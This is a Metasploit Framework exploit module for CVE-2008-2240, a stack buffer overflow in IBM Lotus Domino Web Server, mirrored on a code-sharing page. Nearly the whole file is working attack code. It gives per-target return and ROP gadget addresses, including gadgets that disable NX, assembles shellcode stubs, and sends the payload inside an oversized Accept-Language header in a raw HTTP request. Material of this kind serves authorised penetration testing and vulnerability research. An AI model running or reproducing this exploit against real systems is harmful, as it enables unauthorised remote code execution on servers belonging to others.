Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/lotus/domino_http_accept_language.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',

16
        'Description'	=> %q{

17
          This module exploits a stack buffer overflow in IBM Lotus Domino Web Server

18
          prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP

19
          request with an Accept-Language header greater than 114 bytes.

20
        },

21
        'Author'	=> [ 'Fairuzan Roslan <riaf[at]mysec.org>', '<Earl Marcus klks[at]mysec.org>' ],

22
        'License'	=> MSF_LICENSE,

23
        'References' => [

24
          ['CVE', '2008-2240'],

25
          ['OSVDB', '45415'],

26
          ['BID', '29310'],

27
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC'	=> 'thread',

31
        },

32
        'Privileged'	=> true,

33
        'Payload' => {

34
          'Space'	=> 800,

35
          'BadChars'	=> "\x00\x0a\x20\x2c\x3b",

36
          'StackAdjustment'	=> -3500,

37
        },

38
        'Platform'	=>	'win',

39
        'Targets' => [

40


41
          [

42
            'Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',

43
            {

44
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret	 	@fontmanager.dll

45
              'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll

46
              'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll

47
              'Ret'	=> 0x62c838c7, # ret 0x12e			@nlsccstr.dl

48
              'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll

49
              'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll

50
            }

51
          ],

52


53
          [

54
            'Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',

55
            {

56
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll

57
              'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll

58
              'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll

59
              'Ret'	=> 0x62c838c7, # ret 0x12e			@nlsccstr.dll

60
              'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll

61
              'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll

62
            }

63
          ],

64


65
          [

66
            'Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',

67
            {

68
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll

69
              'JmpESP'	=> 0x62c6072e, # jmp esp			@lsccstr.dll

70
            }

71
          ],

72


73
          [

74
            'Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',

75
            {

76
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll

77
              'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll

78
              'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll

79
              'Ret'	=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll

80
              'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll

81
              'JmpESP'	=> 0x6391071e, # jmp esp 			@nlsccstr.dll

82
            }

83
          ],

84


85
          [

86
            'Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',

87
            {

88
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll

89
              'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll

90
              'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll

91
              'Ret'	=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll

92
              'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll

93
              'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll

94
            }

95
          ],

96


97
          [

98
            'Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',

99
            {

100
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll

101
              'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll

102
            }

103
          ],

104


105
        ],

106
        'DisclosureDate' => '2008-05-20',

107
        'Notes' => {

108
          'Reliability' => UNKNOWN_RELIABILITY,

109
          'Stability' => UNKNOWN_STABILITY,

110
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

111
        }

112
      )

113
    )

114
  end

115


116
  def exploit

117
    connect

118


119
    lang = rand_text_alphanumeric(116)	# greetz to hateful chris

120
    lang[56, 4] = [ 0xfffffffe ].pack('V')			# Fix Second crash (esi)

121
    lang[68, 4] = [ 0x7ffaf0ec ].pack('V')			# Fix Second crash (eax)

122
    lang[104, 4] = [ 0x7ffaf030 ].pack('V')	# Fix First crash

123
    lang[112, 4] = [target['FixESP']].pack('V')	# 1

124
    lang << "\x00"

125
    lang << payload.encoded

126


127
    if (not target['DisableNX'])

128
      lang[16, 15] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string	# 4

129
      lang[80, 4] = [target['JmpESP']].pack('V')	# 2

130
      lang[84, 2] = Rex::Arch::X86.jmp_short(-0x46)	# 3 jmp back to top

131
    else

132
      lang[16, 16] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string	# 8

133
      lang[80, 4] = [target['FixESI']].pack('V')		# 2

134
      lang[84, 4] = [target['FixEBP']].pack('V')		# 3

135
      lang[88, 4] = [target['Ret']].pack('V')	# 4

136
      lang[92, 4] = [target['JmpESP']].pack('V')	# 6

137
      lang[100, 2] = Rex::Arch::X86.jmp_short(-0x56)	# 7  jmp back to top

138
      lang[108, 4] = [target['DisableNX']].pack('V')	# 5

139
    end

140


141
    uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)	# Trigger

142


143
    print_status("Trying target #{target.name}...")

144
    send_request_raw({

145
      'uri'	=> "#{uri}",

146
      'method'	=> 'GET',

147
      'headers'	=>

148
            {

149
              'Accept'	=> '*/*',

150
              'Accept-Language'	=> "#{lang}",

151
              'Accept-Encoding'	=> 'gzip,deflate',

152
              'Keep-Alive'	=> '300',

153
              'Connection'	=> 'keep-alive',

154
              'User-Agent'	=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',

155
            }

156
    }, 5)

157
    handler

158
    disconnect

159
  end

160
end

161


162